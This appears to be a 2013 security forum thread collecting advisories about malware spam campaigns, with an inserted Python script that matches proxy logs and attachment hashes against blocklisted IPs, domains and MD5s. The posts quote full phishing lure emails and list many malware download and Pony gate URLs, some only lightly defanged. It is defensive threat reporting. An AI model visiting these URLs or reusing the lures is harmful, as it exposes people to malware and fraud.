188.134.26.172
209.222.67.251 ..."
* http://urlquery.net/report.php?id=3928752
Diagnostic page for AS36351 (SOFTLAYER)
** https://www.google.com/safebrowsing/diagnostic?site=AS:36351
"... over the past 90 days, 5148 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-07-22, and the last time suspicious content was found was on 2013-07-22... Over the past 90 days, we found 662 site(s) on this network... that appeared to function as intermediaries for the infection of 2618 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 868 site(s)... that infected 6671 other site(s)..."
___
Fake BMW SPAM / pagebuoy .net
- http://blog.dynamoo.com/2013/07/bmw-spam-pagebuoynet.html
22 July 2013 - "This convincing looking BMW spam leads to malware ...
Date: Mon, 22 Jul 2013 13:07:50 -0500 [14:07:50 EDT]
From: BMW of North America [womanliere75 @postmaster.aa-mail .org]
Reply-To: [redacted]@m.aa-mail .com
Subject: The BMW 6-Series M Sport Edition, M Universe, and more.
BMW’s 6-Series M Sport Edition View Online
BMW
A 6 SERIES.
WITH M PANACHE.
Meet the 6-Series M Sport Edition. Available in all 6 series models, the M Sport Edition boasts premium features like M Aerodynamics, LED Adaptive Headlights, an M leather steering wheel, and Nappa Leather sport seats for a ride that’s a 6-Series inside and out.
LEARN MORE
Efficient Dynamics
Table of Contents
» BMW M Universe
» BMW Wins Again
» BMW i3 Design
» BMW Superbike
» BMW Collections
WELCOME TO M’S NEW HOME.
In the M Universe, your own M photos will become part of a visual timeline spanning all 40 award-winning years of the iconic M brand, from the classic 1972 to the new M6 Gran Coupe. To all you M fans, welcome home.
» ENTER BMW M UNIVERSE
THE 3 SERIES WINS AGAIN
The BMW 3 Series continues to live up to its hard-earned reputation as the best compact sports sedan in the world. AUTOMOBILE MAGAZINE presented the 3 Series with the coveted 2013 All-Star award, making the number of AUTOMOBILE MAGAZINE awards won by the 3 Series alone over a dozen.
» BUILD YOUR OWN ...
Screenshot: https://lh3.ggpht.com/-NQsSlwUYaOI/Ue2BI90munI/AAAAAAAABi4/3QqveMDdfc0/s400/bmw-spam.jpg
The link in the email goes through a legitimate -hacked- site and ends up on [donotclick]links.emails.bmwusa.com.open.pagebuoy .net/news/bmw-newmodel.php (report here*) which is hosted on the same IP addresses as this spam run**."
* http://urlquery.net/report.php?id=3929867
** http://blog.dynamoo.com/2013/07/american-airlines-spam-sai-uka-saicom_22.html
___
NY Better Business Bureau Spam
- http://threattrack.tumblr.com/post/56167753478/ny-better-business-bureau-spam
July 22, 2013 - "Subjects Seen:
FW: Case <removed>
Typical e-mail details:
The Better Business Bureau has received the above-referenced complaint from one of your customers regarding their dealings with you. The details of the consumer’s concern are included on the reverse. Please review this matter and advise us of your position.
As a neutral third party, the Better Business Bureau can help to resolve the matter. Often complaints are a result of misunderstandings a company wants to know about and correct.
In the interest of time and good customer relations, please provide the BBB with written verification of your position in this matter by June 30, 2013. Your prompt response will allow BBB to be of service to you and your customer in reaching a mutually agreeable resolution. Please inform us if you have contacted your customer directly and already resolved this matter.
The Better Business Bureau develops and maintains Reliability Reports on companies across the United States and Canada . This information is available to the public and is frequently used by potential customers. Your cooperation in responding to this complaint becomes a permanent part of your file with the Better Business Bureau. Failure to promptly give attention to this matter may be reflected in the report we give to consumers about your company.
We encourage you to print this complaint (attached file), answer the questions and respond to us.
We look forward to your prompt attention to this matter.
Sincerely ...
Malicious URLs
yourprospexblog .com:8080/ponyb/gate.php
myimpactblog .com:8080/ponyb/gate.php
phonebillssuck .com:8080/ponyb/gate.php
prospexleads .com:8080/ponyb/gate.php
moneyinmarketing .com/dL1.exe
abbeyevents .co .uk/fNF1.exe
salsaconfuego .com/RCY.exe
fales .info/PwvextRo.exe
Malicious File Name and MD5:
Complaint_<date>.zip (B82478381DCECD63B81F64EDF7632D51)
Complaint_<date>.zip (95B542B1BCBD7D5AEE65F97E9125D90C)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/9867f46a3b154e7ed25177d8ef519c00/tumblr_inline_mqcrjiUJgV1qz4rgp.png
___
Fake IRS "Complaint Case #488870383295" SPAM / Complaint_488870383295.zip
- http://blog.dynamoo.com/2013/07/irsgov-complaint-case-488870383295-spam.html
22 July 2013 - "This spam contains a malicious attachment, but seems to confuse the roles of the BBB and the IRS.
Date: Mon, 22 Jul 2013 09:59:08 -0500 [10:59:08 EDT]
From: "IRS.gov" [fraud .dep @irs. gov]
Subject: Complaint Case #488870383295
You have received a complaint in regards to your business services.
The complaint was filled by Mr./Mrs. Ulivo DELERME on 07/22/2013/
Case Number: 488870383295
Instructions on how to resolve this complaint as well as a copy of the original complaint are attached to this email.
Disputes involving consumer products and/or services may be arbitrated. Unless they directly relate to the contract that is the basis of this dispute, the following claims will be considered for arbitration only if all parties agree in writing that the arbitrator may consider them: Claims based on product liability; Claims for personal injuries; Claims that have been resolved by a previous court action, arbitration, or written agreement between the parties.
The decision as to whether your dispute or any part of it can be arbitrated rests solely with the IRS.
The IRS offers a binding arbitration service for disputes involving marketplace transactions. Arbitration is a convenient, civilized way to settle disputes quickly and fairly, without the costs associated with other legal options.
2013 Council of IRS, Inc. All Rights Reserved.
Attached to the email is a ZIP file Complaint_488870383295.zip which in turn contains an executable Complaint_07222013.exe which is bad news. VirusTotal detection rates are a so-so 14/47*... the Malwr analysis** seems to be the most comprehensive and shows traffic out to the following compromised sites:
prospexleads .com
phonebillssuck .com
moneyinmarketing .com
abbeyevents .co.uk
salsaconfuego .com
fales .info
The second part has a much lower detection rate of just 2/47. At the moment this second stage is still being analysed."
* https://www.virustotal.com/en/file/d9a07efbf2c59f1d13fa37854bf85d6334131bfcf3797eca0e8d677b1fcf3da4/analysis/1374520022/
** https://malwr.com/analysis/MGIxNjJjYzM1OTlkNDgxNGJmYmM4ODE1YzE4Yzc0ZGI/
:mad: :sad: :fear:
AplusWebMaster
2013-07-23, 17:43
FYI...
Fake Media Player - rogue video Downloader PUA
- http://blog.webroot.com/2013/07/23/deceptive-media-player-update-ads-expose-users-to-the-rogue-video-downloaderbundlore-potentially-unwanted-application-pua/
July 23, 2013 - "Our sensors continue picking up deceptive advertisements that expose gullible and socially engineered users to privacy-invading applications and toolbars, most commonly known as Potentially Unwanted Applications (PUAs). The latest detected campaign utilizes multiple legitimately looking banners in an attempt to trick users into thinking that their media player needs to be updated. Once users install the bogus ‘Media Player Update’, they introduce third-party privacy-invading software onto their PCs and directly contribute to the revenue flow of the cybercriminals behind the campaign...
Sample screenshots of multiple deceptive ads leading to the same Potentially Unwanted Application (PUA):
> https://webrootblog.files.wordpress.com/2013/07/deceptive_ads_rogue_ads_adware_potentially_unwanted_application_pua_bundlore_fake_media_player_update.png
> https://webrootblog.files.wordpress.com/2013/07/deceptive_ads_rogue_ads_adware_potentially_unwanted_application_pua_bundlore_fake_media_player_update_01.png?w=869
> https://webrootblog.files.wordpress.com/2013/07/deceptive_ads_rogue_ads_adware_potentially_unwanted_application_pua_bundlore_fake_media_player_update_03.png?w=869
... Sample screenshot of the landing page:
https://webrootblog.files.wordpress.com/2013/07/deceptive_ads_rogue_ads_adware_potentially_unwanted_application_pua_bundlore_fake_media_player_update_06.png?w=641&h=544
Rogue URL:
hxxp ://dkg.videodownloadonline .com/download/video_downloader – 107.14.36.160; 107.14.36.120
Detection rate for the PUA – MD5: 85387afff8e5e66e2d9cc5dc1c43c922 * ... Adware.Downware.925; Bundlore (fs). The sample is digitally signed by Bundlore LTD, which is yet another pay-per-install affiliate network.
Rogue URL: bundlore .com – 98.129.229.186 – Email: eldad.shaltiel @gmail .com
... MD5s... known to have interacted with the same IP (98.129.229.186)..."
(More detail at the first webroot URL above.)
* https://www.virustotal.com/en/file/f67cfda990b302a4fa8d37a45c0424ca67f707988a3d6f7971768ce161ae4d3a/analysis/
___
Malware sites to block 23/7/13
- http://blog.dynamoo.com/2013/07/malware-sites-to-block-23713.html
23 July 2013 - "These malicious domains and IPs are associated with this prolific gang*. As usual, I've listed IPs with hosts first and then a plain list of IPs and domains for copy-and-pasting at the end..."
(Long list of IPs at the dynamoo URL above.)
* http://blog.dynamoo.com/search/label/Amerika
___
Linkedin Spam leads to Canadian Pharma sites
- http://www.threattracksecurity.com/it-blog/linkedin-spam-leads-to-canadian-pharma-sites/
July 23, 2013 - "We’ve seen an email spam-run taking place over the last couple of days, involving what appear to be compromised websites redirecting end-users to Canadian pharmacy spam pages (and quite possibly other forms of medicinal spam content too). Here’s an example of one such email – at time of writing, -all- of them are Linkedin message imitations:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/sadtech1.jpg ...
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/sadtech4.jpg
... Another redirect destination we’ve seen is ipadherbaltablet(dot)com – again, offline at time of writing. Campaigns such as the above tend to be fast moving, constantly shifting URLs as compromised sites get a handle on the hack and new spam domains are set up to replace the ones that are blacklisted / shut down... they have the direct, non-Linkedin URL right there in the Email body. The non-hidden URLs, combined with the seemingly short lifespan of the spam sites will hopefully mean this one isn’t clogging up mailboxes for too long."
___
“Click This Photo for Tumblr Fame” Turns Volume Up...
- http://www.threattracksecurity.com/it-blog/click-this-photo-for-tumblr-fame-turns-volume-up-to-eleven/
July 23, 2013 - "... garish set of posts that have been doing the rounds on Tumblr over the last day or so. Here’s the most recent collection of archived posts on an affected blog..
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/clickforfame1.jpg
... “Click this photo for Tumblr fame”, claims the animated .gif. Animated? You bet. It rotates through 3 different “promo” images, and by the time the image goes out of sync on the Archive page it ends up looking something like this with all of the second-long splash images rotating away and vying for attention... The bulk of the posts on the above blog have around 1,000+ reblogs / notes each, though some of them are reposts of the same content. In all cases, they use a shortened URL service to send users to their final destination... At time of writing, none of the apps appear to have done anything publicly – there’s certainly nothing posted to our test account – but we’ll continue to monitor and see what happens."
(More detail at the first URL above.)
___
Something evil on 91.233.244.102
- http://blog.dynamoo.com/2013/07/something-evil-on-91233244102.html
23 July 2013 - "These following domains are hosted on 91.233.244.102 (Olborg Ltd, Russia). This IP is implicated in Runforestrun infectors*, has several malware detections on VirusTotal** plus a few on URLquery***. Google has flagged several domains as being malicious... Obviously there's quite a concentration of evil on this IP address and the simplest thing to do would be to banish it from your network, in fact I would personally recommend blocking the whole 91.233.244.0/23 block..."
(More detail at the dynamoo URL above.)
* http://malwaremustdie.blogspot.co.uk/2013/07/the-come-back-of-ru-runforrestruns-dga.html
** https://www.virustotal.com/en-gb/ip-address/91.233.244.102/information/
*** http://urlquery.net/search.php?q=91.233.244.102&type=string&start=2013-07-08&end=2013-07-23&max=50
___
Incoming Money Transfer Spam
- http://threattrack.tumblr.com/post/56245875980/incoming-money-transfer-spam
July 23, 2013 - "Subjects Seen:
Important Notice - Incoming Money Transfer
Typical e-mail details:
please complete the “A136 Incoming Money Transfer Form".
Fax a copy of the completed “A136 Incoming Money Transfer Form" to +1 800 722 1934.
To avoid delays or additional fees please be sure the Beneficiary Information including name, branch name, address, city, state, country, and Routing Number (ABA Number) or SWIFT BIC Code is correct. For international Wires be sure you include the International Routing Code (IRC) and International Bank Account Number (IBAN) for countries that require it.
Thank you,
Lowell_Madden
Senior Officer
Cash Management Verification
Malicious URLs
yourprospexblog .com:8080/ponyb/gate.php
myimpactblog .com:8080/ponyb/gate.php
phonebillssuck .com:8080/ponyb/gate.php
prospexleads .com:8080/ponyb/gate.php
abbeyevents .co .uk/fNF1.exe
salsaconfuego .com/RCY.exe
aasportsacademy .com/FPzbn.exe
whiteheadst .com/JrN9Jv.exe
Malicious File Name and MD5:
A136_Incoming_Money_Transfer_Form.zip (9BD136876BD8B5796C30F1750983E764)
A136_Incoming_Money_Transfer_Form.exe (3CDA70F6B2628A6CD1F552F5FEB11F05)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/3f8d504508cdaefc11a1c60350f6605d/tumblr_inline_mqec2r2TvM1qz4rgp.png
___
Fake Incoming Money Transfer SPAM / A136_Incoming_Money_Transfer_Form.zip
- http://blog.dynamoo.com/2013/07/webcashmgmtcom-incoming-money-transfer.html
23 July 2013 - "This fake webcashmgmt .com spam comes with a malicious attachment:
Date: Tue, 23 Jul 2013 10:21:08 -0500 [11:21:08 EDT]
From: WebCashmgmt [Alberto_Dotson @webcashmgmt .com]
Subject: Important Notice - Incoming Money Transfer
An Incoming Money Transfer has been received by your financial institution for spamcop.net. In order for the funds to be remitted on the correct account please complete the "A136 Incoming Money Transfer Form".
Fax a copy of the completed "A136 Incoming Money Transfer Form" to +1 800 722 5331...
There is an attachment A136_Incoming_Money_Transfer_Form.zip containing an executable file A136_Incoming_Money_Transfer_Form.exe. The VirusTotal detection rate is a miserable 6/47*.
This is a two stage pony/gate infection according to the Malwr report**. Functionally it looks very similar to the payload used in this spam run***."
* https://www.virustotal.com/en-gb/file/c1a9b3651a77901979e0d53cfc9eebb89805cb8ef678c61d42ce304357487023/analysis/1374594791/
** https://malwr.com/analysis/MDcyYmQ4NjRkYzJlNGYyYTkyZjI3YjEzMzliYmRhYjg/
*** http://blog.dynamoo.com/2013/07/irsgov-complaint-case-488870383295-spam.html
___
Facebook Friend Spam
- http://threattrack.tumblr.com/post/56253946196/facebook-freind-spam
July 23, 2013 - "Subjects Seen:
[removed] wants to be friends with you on Facebook.
Typical e-mail details:
[removed] wants to be friends with you on Facebook.
Malicious URLs
dynamicservicesllc .com/neglectfully/index.html
discountprescriptions.pacificsocial .com/displeased/index.html
ic44 .com/ganglier/index.html
hi-defhooters .com/topic/accidentally-results-stay.php
hi-defhooters .com /topic/accidentally-results-stay.php?VwsYyU=opovyGaoS&NWnVfHBlqeCu=CAAbE
hi-defhooters .com /topic/accidentally-results-stay.php?xf=2e2g2j2h2g&be=57312h522j2h2g562f2j&X=2d&Rf=q&El=C
hi-defhooters .com/adobe/update_flash_player.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/ec962cc595f7d69325cea0e06eb3435c/tumblr_inline_mqehikGNae1qz4rgp.png
:fear: :mad:
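Added example, not part of the quoted posts or of the dynamoo/ThreatTrack write-ups: an indicator matcher that turns the "Recommended blocklist" IPs from the 22 July American Airlines post, the Olborg Ltd 91.233.244.0/23 range from the 23 July "Something evil" post, the Pony gate domains and the attachment MD5s above into checks a proxy log or mail gateway can apply. The domain match works on label boundaries, which is what catches the long look-alike hostname www.aa.com.reservation....sai-uka-sai .com by its registered domain. The log format ("epoch client method url") and the log lines themselves are constructed for the example.

```python
import ipaddress
from urllib.parse import urlsplit

# Indicators copied from the 22 and 23 July posts above. The /23 is the
# Olborg Ltd range dynamoo recommends banishing; the single IPs are the
# sai-uka-sai / pagebuoy landing hosts from the "Recommended blocklist".
BLOCK_NETS = [ipaddress.ip_network(n) for n in (
    "50.97.253.162", "95.111.32.249", "188.134.26.172", "209.222.67.251",
    "91.233.244.0/23",
)]
# Landing-page and Pony gate domains from the same posts (registered
# domain only; subdomains are matched by domain_blocked below).
BLOCK_DOMAINS = {
    "sai-uka-sai.com", "pagebuoy.net", "nphscards.com", "nphssoccercards.com",
    "yourprospexblog.com", "myimpactblog.com", "phonebillssuck.com",
    "prospexleads.com",
}
# MD5s of the malicious ZIP attachments listed by ThreatTrack.
BLOCK_MD5 = {
    "b82478381dcecd63b81f64edf7632d51", "95b542b1bcbd7d5aee65f97e9125d90c",
    "9bd136876bd8b5796c30f1750983e764", "3cda70f6b2628a6cd1f552f5feb11f05",
}


def domain_blocked(host):
    """True if host is a blocked domain or any subdomain of one.

    Matching on label boundaries (not substring) catches the look-alike
    hostname www.aa.com.reservation....sai-uka-sai.com while leaving
    e.g. notsai-uka-sai.com alone.
    """
    labels = host.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in BLOCK_DOMAINS for i in range(len(labels)))


def ip_blocked(host):
    """True if host is a literal IP inside one of the blocked networks."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:          # a hostname, not an address
        return False
    return any(addr in net for net in BLOCK_NETS)


def check_url(url):
    """Verdict for one requested URL, or None if no indicator matched."""
    u = urlsplit(url if "://" in url else "http://" + url)
    host = u.hostname or ""
    if ip_blocked(host):
        return "blocked-ip"
    if domain_blocked(host):
        return "blocked-domain"
    return None


def check_attachment(md5):
    """Verdict for an e-mail attachment hash (case-insensitive compare)."""
    return "known-bad-attachment" if md5.lower() in BLOCK_MD5 else None


# Constructed proxy log, "epoch client method url" (not from the posts).
SAMPLE_LOG = """\
1374514800 10.1.2.3 GET http://www.aa.com.reservation.viewFareRuleDetailsAccess.do.sai-uka-sai.com/news/american-airlines-hold.php
1374514801 10.1.2.3 GET http://50.97.253.162/news/american-airlines-hold.php
1374514802 10.1.2.4 GET http://example.org/index.html
1374514803 10.1.2.5 POST http://yourprospexblog.com:8080/ponyb/gate.php
1374514804 10.1.2.6 GET http://91.233.245.17/
"""


def scan_log(text):
    """Return (client, verdict, host) for every log line that hits an indicator."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        client, url = parts[1], parts[3]
        verdict = check_url(url)
        if verdict:
            hits.append((client, verdict, urlsplit(url).hostname))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
    print(check_attachment("B82478381DCECD63B81F64EDF7632D51"))
```

Exact indicators like these go stale within hours (the landing domains change from run to run in the posts above), so the value is in blocking the hosting ranges the write-ups call out and in alerting on any client that reached them, rather than in the domain list alone.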
AplusWebMaster
2013-07-24, 19:51
FYI...
Fake Facebook pwd reset SPAM / nphscards .com
- http://blog.dynamoo.com/2013/07/you-requested-new-facebook-password.html
- "This fake Facebook spam leads to malware on nphscards .com:
Date: Wed, 24 Jul 2013 11:22:46 -0300 [10:22:46 EDT]
From: Facebook [update+hiehdzge @facebookmail .com]
Subject: You requested a new Facebook password
facebook
Hello,
You recently asked to reset your Facebook password.
Click here to change your password.
Didn't request this change?
If you didn't request a new password, let us know immediately.
Change Password
This message was sent to [redacted] at your request.
Facebook, Inc., Attention: Department 415, PO Box 10005, Palo Alto, CA 94303
The link in the email goes through a legitimate -hacked- site and then through one or both of these following scripts:
[donotclick]ftp.thermovite .de/kurile/teeniest.js
[donotclick]traditionlagoonresort .com/prodded/televised.js
The victim is then directed to [donotclick]nphscards .com/topic/accidentally-results-stay.php (report here*) which appears to be 403ing, but this may just be trickery. The site is hosted on 162.216.18.169 (Linode, US) and the domain nphscards .com itself appears to have been hijacked from GoDaddy. The domain nphssoccercards .com is also on the same server and is probably hijacked."
* http://urlquery.net/report.php?id=3976081
- https://www.virustotal.com/en/ip-address/162.216.18.169/information/
___
Royal Baby News Spam
- http://threattrack.tumblr.com/post/56335087514/cnn-royal-baby-breaking-news-spam
July 24, 2013 - "Subjects Seen:
"Perfect gift for royal baby … a tree?" - BreakingNews CNN
Typical e-mail details:
Washington (CNN)— What will the Obamas get the royal wee one? Sources say it’s a topic under discussion in the White House and at the State Department.
No baby buggy will do. The president and first lady must find a special gift to honor the special relationship between the United States and the United Kingdom.
Kate and William bring home royal baby boy
Malicious URLs
wurster .ws/rump/index.html
assuredpropertycare .net/intersperse/index.html
tennisclub-iburg .de/hepper/index.html
nphscards .com /topic/accidentally-results-stay.php?Ff=5656562e2i&Ce=2d2i562g552g2f572i54&P=2d&Ek=j&PD=j
nphscards .com /topic/accidentally-results-stay.php?TbcoUkQBgX=hGSiu&qhiHoQj=JBEYjg
nphssoccercards .com/adobe/update_flash_player.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f16fcb9bd5affe88baecec65c204d2a4/tumblr_inline_mqg3qltKRB1qz4rgp.png
- http://blog.dynamoo.com/2013/07/cnn-perfect-gift-for-royal-baby-tree.html
24 July 2013 - "This fake CNN spam leads to malware on nphscards .com:
Date: Wed, 24 Jul 2013 19:54:18 +0400 [11:54:18 EDT]
From: "Perfect gift for royal baby ... a tree?" [BreakingNews @mail.cnn .com]
Subject: "Perfect gift for royal baby ... a tree?" - BreakingNews CNN
CNN
U.S. presidents have spotty record on gifts for royal births ..."
Screenshot: https://lh3.ggpht.com/-q2zR6Kvn-ng/UfBShXGCb-I/AAAAAAAABmQ/4Vbk1T74toY/s400/cnn-baby.png
The payload works in exactly the same way as this fake Facebook spam* earlier today and consists of a hacked GoDaddy domain (nphscards .com) hosted on 162.216.18.169 by Linode."
* http://blog.dynamoo.com/2013/07/you-requested-new-facebook-password.html
- https://www.virustotal.com/en/ip-address/162.216.18.169/information/
- http://www.threattracksecurity.com/it-blog/royal-baby-spam-leads-to-blackhole-zbot-malware/
July 24, 2013 - "... “Royal Baby” Malware to start making the rounds... The Malware in question involves... Blackhole Exploit Kit, which leads end-users to Zbot (the Zeus Infostealer) / Medfos ( which typically displays adverts, connects to numerous IP addresses and can also download additional files )..."
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/royalbabymalwarespam.jpg
___
eBay iPhone Order Spam
- http://threattrack.tumblr.com/post/56341055129/ebay-iphone-order-spam
July 24, 2013 - "Subjects Seen:
Payment Received - eBay item #[removed] NEW WHITE-CA Acoustic Guitar+GIGBAG+STRAP+TUNER+LESSON
Typical e-mail details:
Hello Dear Customer,
Your payment has been received for the following item. If extra shipping
charges is required per our ad and not received (for all military addresses/AK/PR/PO
Box and other U.S.territories outside of the 48 states), we may contact you
shortly. Be sure your Ebay registered address and contact phone number
is accurate as the order will be processed as such.
Malicious URLs
compare-treadmills .co .uk/fosters/index.html
bernderl .de/fife/index.html
tennisclub-iburg .de/hepper/index.html
nphscards .com/topic/accidentally-results-stay.php?ceJfcWErQTbG=kCwAByXBRdETOJ&tsDWPg=RpZTfjhgRFCk
nphscards .com/topic/accidentally-results-stay.php?ff=2g3131542j&ke=302g572f5352572i572f&D=2d&pb=U&sR=I
nphscards .com/adobe/update_flash_player.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/3c4c2af7bce3117596be82842c9ddd94/tumblr_inline_mqg89rlx4R1qz4rgp.png
___
Fake inTuit emails - "Your payments are being processed for deposit"
- http://security.intuit.com/alert.php?a=84
7/23/13 - "People are receiving -fake- emails with the title "Your payments are being processed for deposit". Below is a copy of the email people are receiving.
> http://security.intuit.com/images/phish84.jpg
This is the end of the -fake- email.
- Steps to Take Now
Do not open the attachment in the email...
Delete the email..."
:mad::fear:
AplusWebMaster
2013-07-25, 19:22
FYI...
Fake CNN SPAM / evocarr .net
- http://blog.dynamoo.com/2013/07/cnn-77-dead-after-train-derails-spam.html
25 July 2013 - "This spam mismatches two topics, a train crash in Spain and the birth of a royal baby in the UK, but it leads to malware on evocarr .net:
Date: Thu, 25 Jul 2013 20:19:44 +0800 [08:19:44 EDT]
From: 77 dead after train derails [BreakingNews @mail.cnn .com]
Subject: "Perfect gift for royal baby ... a tree?" - BreakingNews CNN
77 dead after train derails, splits apart in Spain
By Al Goodman, Elwyn Lopez, Catherine E. Shoichet, CNN July 25, 2013 -- Updated 0939 GMT (1739 HKT)
iReporter: 'It was a horrific scene'
STORY HIGHLIGHTS
NEW: Train driver told police he entered the bend too fast, public broadcaster reports
NEW: Regional governor declares 7 days of mourning for the victims, broadcaster says
Witness: "The train was broken in half. ... It was quite shocking"
77 people are dead, more bodies may be found, regional judicial official says
Madrid (CNN) -- An express train derailed as it hurtled around a curve in northwestern Spain on Wednesday, killing at least 77 people and injuring more than 100, officials said. Full Story ...
Screenshot: https://lh3.ggpht.com/-DV8NS7UNyVg/UfEkgvPaxkI/AAAAAAAABmk/2NCENHV902w/s400/cnn-train.png
The link in the email goes to a legitimate -hacked- site which tries to load one or more of the following scripts:
[donotclick]church.main .jp/psychosomatics/rayon.js
[donotclick]video.whatsonstage .com/overstocking/ownership.js
[donotclick]www.fewo-am-speckbusch .de/referees/metacarpals.js
From there the victim is sent to a landing page at [donotclick]evocarr .net/topic/accidentally-results-stay.php hosted on 69.163.34.49 (Directspace LLC, US). The following -hijacked- GoDaddy domains are on the same IP and can be considered suspect:
evocarr .net
serapius .com
leacomunica .net
mindordny .org
rdinteractiva .com
yanosetratasolodeti .org "
___
CNN Spanish Train Derailment Spam
- http://threattrack.tumblr.com/post/56423696906/cnn-spanish-train-derailment-spam
July 25, 2013 - "Subjects Seen:
"Perfect gift for royal baby … a tree?" - BreakingNews CNN
Typical e-mail details:
77 dead after train derails, splits apart in Spain
iReporter: ‘It was a horrific scene’
STORY HIGHLIGHTS
NEW: Train driver told police he entered the bend too fast, public broadcaster reports
NEW: Regional governor declares 7 days of mourning for the victims, broadcaster says
Witness: “The train was broken in half. … It was quite shocking"
77 people are dead, more bodies may be found, regional judicial official says
Madrid (CNN) — An express train derailed as it hurtled around a curve in northwestern Spain on Wednesday, killing at least 77 people and injuring more than 100, officials said. Full Story ...
Malicious URLs
caribbeancinemas .net/cheerfullest/index.html
sroehl .de/inpatient/index.html
evocarr .net/topic/accidentally-results-stay.php?wf=57552j302f&qe=302g572f5352572i572f&T=2d&XD=A&Zn=r
evocarr .net/topic/accidentally-results-stay.php?KVVWmNcvwPD=WJOsotrS&BTvKFG=felbOVVkanHPuB
evocarr .net/adobe/update_flash_player.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/dace998b5db031c2e0372b6e9f46f9a4/tumblr_inline_mqhv187d9o1qz4rgp.png
___
Malicious Facebook E-Mail Spam Campaigns
- http://threattrack.tumblr.com/post/56424852456/malicious-facebook-e-mail-spam-campaigns
July 25, 2013
"New Password Request:
> https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/9c4831b589f37e9558122e2362834db2/tumblr_inline_mqhvuapVxT1qz4rgp.png
Friend Request:
> https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/b709af9dbc7bbacaf60707ced8746bc3/tumblr_inline_mqhw93PsWI1qz4rgp.png
Tagged Photos Notification:
> https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/b67e2f6f2df73be437bff6105fdd9e5f/tumblr_inline_mqhvvvTHbs1qz4rgp.png
Subjects Seen:
You requested a new Facebook password
<Name> wants to be friends with you on Facebook.
<Name> tagged 2 photos of you on Facebook
Typical e-mail details:
New Password Request:
Hello,
You recently asked to reset your Facebook password.
Click here to change your password.
Friend Request:
<Name> wants to be friends with you on Facebook.
Tagged Photos Notification:
<Name> added 5 photos of you.
Malicious URLs
dl2htd .de/surfaces/index.html
airductservicepro .com/lighthouse/index.html
99906.webhosting33.1blu .de/stupids/index.html
128.121.242.173 /nutritional/index.html
handmadelifecoaching .com/compelled/index.html
villaflorida .biz/deepness/index.html
ekaterini.mainsys .gr/exhorted/index.html
hackspitz .com/gnarl/index.html
joerg.gmxhome .de/skeptically/index.html
lostfounddevices .com/mama/index.html
spurtwinslotshelvingsystems .co .uk/aquamarine/index.html
bbsmfg .biz/servo/index.html
198.251.67.11 /reprehended/index.html
evocarr .net/topic/accidentally-results-stay.php?wf=57552j302f&qe=302g572f5352572i572f&T=2d&XD=A&Zn=r
evocarr .net/topic/accidentally-results-stay.php?KVVWmNcvwPD=WJOsotrS&BTvKFG=felbOVVkanHPuB
evocarr .net/adobe/update_flash_player.exe
___
Incoming Fax Report Spam
- http://threattrack.tumblr.com/post/56436571606/incoming-fax-report-spam
July 25, 2013 - "Subjects Seen:
INCOMING FAX REPORT : Remote ID: <random>
Typical e-mail details:
*********************************************************
INCOMING FAX REPORT
*********************************************************
Date/Time: 07/25/2013 04:42:54 CST
Speed: 26606 bps
Connection time: 05:09
Pages: 6
Resolution: Normal
Remote ID:
Line number: 1
DTMF/DID:
Description: June Payroll
Click here to view the file online ...
Malicious URLs
funeralsintexas .com/someplace/index.html
keralahouseboatstourpackages .com/mansion/index.html
christinegreenmd .com/inductees/index.html
ente-gmbh .de/bragg/index.html
impresiona2 .net/topic/regard_alternate_sheet.php?uf=2i2h2f5653&Je=302g572f5352572i572f&Y=2d&kc=i&bN=Q
impresiona2 .net/topic/regard_alternate_sheet.php?Ef=2i2h2f5653&Le=56302d2f2h53562j2j55&a=2d&dV=l&JB=a
impresiona2 .net/adobe/update_flash_player.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/85f8dbdb071da36d58feeaf97200b195/tumblr_inline_mqi537QlWe1qz4rgp.png
Fake FAX SPAM - 2013vistakonpresidentsclub .com
- http://blog.dynamoo.com/2013/07/incoming-fax-report-spam.html
25 July 2013 - "This fake fax report spam (apparently from the Administrator at the Victim's domain) leads to malware on 2013vistakonpresidentsclub .com:
Date: Thu, 25 Jul 2013 10:32:10 -0600 [12:32:10 EDT]
From: Administrator [administrator @victimdomain]
Subject: INCOMING FAX REPORT : Remote ID: 1150758119
*********************************************************
INCOMING FAX REPORT
*********************************************************
Date/Time: 07/25/2013 02:15:22 CST
Speed: 23434 bps
Connection time: 09:04
Pages: 8
Resolution: Normal
Remote ID: 1150758119
Line number: 2
DTMF/DID:
Description: June Payroll
Click here to view the file online ...
The link in the spam leads to a legitimate -hacked- site and then on to one or more of these three intermediary scripts:
[donotclick]1954f7e942e67bc1.lolipop .jp/denominators/serra.js
[donotclick]internationales-netzwerk-portfolio .de/djakarta/opel .js
[donotclick]www.pep7 .at/hampton/riposts.js
From there, the victim is sent to a malware landing page at [donotclick]2013vistakonpresidentsclub .com/topic/regard_alternate_sheet.php which was hosted on 162.216.18.169 earlier today (like this spam*) and was presumably a hijacked GoDaddy domain. I can't tell for certain if this site is clean now or not, but it seems to be on 184.95.37.110 which is a Jolly Works Hosting IP, which has been implicated in malware before**. I would personally block 184.95.37.96/28 to be on the safe side."
* http://blog.dynamoo.com/2013/07/cnn-perfect-gift-for-royal-baby-tree.html
** http://blog.dynamoo.com/search?q=jolly+works+hosting
:fear::fear: :mad:
